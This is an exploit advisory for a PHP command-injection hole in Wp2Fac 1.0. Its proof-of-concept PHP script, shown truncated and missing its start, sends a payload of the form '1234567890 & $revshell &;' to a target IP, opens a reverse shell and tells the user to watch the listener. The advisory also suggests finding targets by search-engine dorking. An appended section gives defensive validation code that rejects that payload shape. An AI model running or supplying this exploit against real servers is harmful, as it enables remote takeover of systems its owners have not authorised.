=============================================================================================================================================
| # Title     : Wp2Fac 1.0 PHP Code Injection Vulnerability
| # Author    : indoushka
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)
| # Vendor    : https://github.com/metinyesil/wp2fac
=============================================================================================================================================

POC :

[+] Dorking in Google or other search engine.

[+] Code Description: Send a POST request using PHP to execute commands on the target server.

    (Related : https://packetstorm.news/files/id/174555/ Related CVE numbers: ) .

[+] save code as poc.php.

[+] Usage: php script.php

[+] PayLoad :

    "1234567890 & $revshell &;"
    ];

    $options = [
        "http" => [
            "header" => implode("\r\n", $headers),
            "method" => "POST",
            "content" => http_build_query($data)
        ]
    ];

    $context = stream_context_create($options);
    $response = file_get_contents($url, false, $context);
    return $response;
    }

    $host = readline("Target IP: ");
    $revshell = readline("Reverse Shell Command: ");
    echo "Check your listener!\n";
    echo send_post_request($host, $revshell);
    ?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
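
The payload above has the shape "digits, then `&`, then a command". The following added example (not part of the original advisory and not Wp2Fac code) shows server-side handling that rejects that shape. It assumes the affected field is meant to hold only digits and that its value ends up in a shell command; the function names, the helper path and the length bounds are hypothetical.

```php
<?php
// Added example with hypothetical names; not taken from the Wp2Fac code base.

/**
 * Accept only a value made of 4 to 15 ASCII digits (constructed bounds).
 * Returns the value unchanged, or null if anything else is present.
 */
function validate_numeric_field(string $raw): ?string
{
    // \A and \z anchor the whole string; "$" alone would accept a trailing newline.
    return preg_match('/\A[0-9]{4,15}\z/', $raw) === 1 ? $raw : null;
}

/**
 * Build the command line for a hypothetical helper program.
 * escapeshellarg() is defence in depth: even a validated value is passed
 * to the shell as one quoted argument, never concatenated raw.
 */
function build_helper_command(string $raw): ?string
{
    $value = validate_numeric_field($raw);
    if ($value === null) {
        return null; // reject outright; never fall back to the raw input
    }
    // Hypothetical helper path, used only to illustrate the quoting.
    return '/usr/local/bin/notify-helper ' . escapeshellarg($value);
}

// Constructed sample inputs. The second has the shape of the payload shown
// in the advisory, with a placeholder where the command would be.
$samples = [
    '1234567890',
    '1234567890 & <command> &;',
    "1234567890\n",
    '1234567890;',
];

foreach ($samples as $sample) {
    $cmd = build_helper_command($sample);
    printf("%-30s => %s\n", json_encode($sample), $cmd ?? 'REJECTED');
}
```

Only the first sample produces a command line; the other three are rejected before any shell string is built.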